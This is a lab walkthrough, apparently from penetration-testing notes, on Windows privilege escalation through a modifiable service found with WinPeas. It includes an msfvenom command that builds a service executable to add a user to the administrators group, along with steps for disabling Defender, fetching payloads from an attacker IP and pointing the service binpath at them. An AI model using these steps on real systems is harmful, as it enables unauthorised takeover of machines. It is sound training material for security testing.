Windows Privilege Escalation

Using WinPeas

  • Making use of an exe that is vulnerable to unquoted service paths

  • Target Windows machine has a non-privileged user: localuser

  • Use MSFVenom: Generate an executable to push the localuser to the administrators group (ASCService.exe)

1 . Generate Payload using MSFVenom

#Generate the malicious exe
msfvenom -p windows/exec CMD='net localgroup administrators localuser /add' -f exe-service -o ASCService.exe
ASCService.exe

2. Start Web Server on Attack Machine

3. Disable Windows Defender & Firewall on Victim Windows Machine

Run the following as powershell administrators

4. Connect back to Attack Machine on Windows Victim via browser

Attacker IP is 172.31.24.120

Navigate and download the payloads

  • move these downloads to the C:/ folder

  • Next we will need to add permissions so that the local users are able to start and stop the service. This is how we simulate excessive permissions on a service.

You should see a response of [SC] SetServiceObjectSecurity SUCCESS.

Run Command Prompt as Different User

Search cmd > right click > run as diff user

Check which accounts are in local administrators group

C:\ > net localgroup administrators

Run WinPeas.exe

WinPeas.exe to enumerate PE paths on Windows systems

  1. Run check for services information

We can see the allAccess enabled for AdvancedSystemCareService9 modifiable service.

A few sections often used for privilege escalation are the

  • Interesting Services -non Microsoft-

  • Modifiable Services sections.

Now query the service using

Next attempt to start and stop the service using:

Now we try to modify the service binpath to point to our new executable. Add a new additional user:

Now start our payload executable:

Since we have permissions and can modify the service itself, we leverage the service to add the localuser to the local admin group

PreviousPost-ExploitationNextLinux Privilege Escalation

Last updated